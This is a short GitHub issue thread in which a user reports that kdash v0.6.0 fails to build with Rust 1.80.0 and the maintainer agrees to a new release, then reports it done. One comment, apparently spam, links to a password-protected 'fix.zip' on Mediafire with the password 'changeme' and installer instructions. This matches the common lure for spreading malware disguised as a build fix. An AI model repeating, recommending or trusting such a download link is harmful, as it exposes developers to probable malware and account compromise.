### ISSUE TITLE
Latest released version (v0.6.0) fails to build with latest Rust

### ISSUE THREAD

**Issue by JanLikar** [kdash-rs/kdash#460]
Due to a regression in Rustc v1.80.0 the crate cannot be built which is causing a downstream packaging issue. See https://github.com/NixOS/nixpkgs/issues/332957#issuecomment-2278578811

The main branch builds without any issues so we would be grateful if you could release a new version of kdash.

**Comment by TerminatedGA** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by deepu105** [comment]
will do a release today :pray:

**Comment by deepu105** [comment]
done
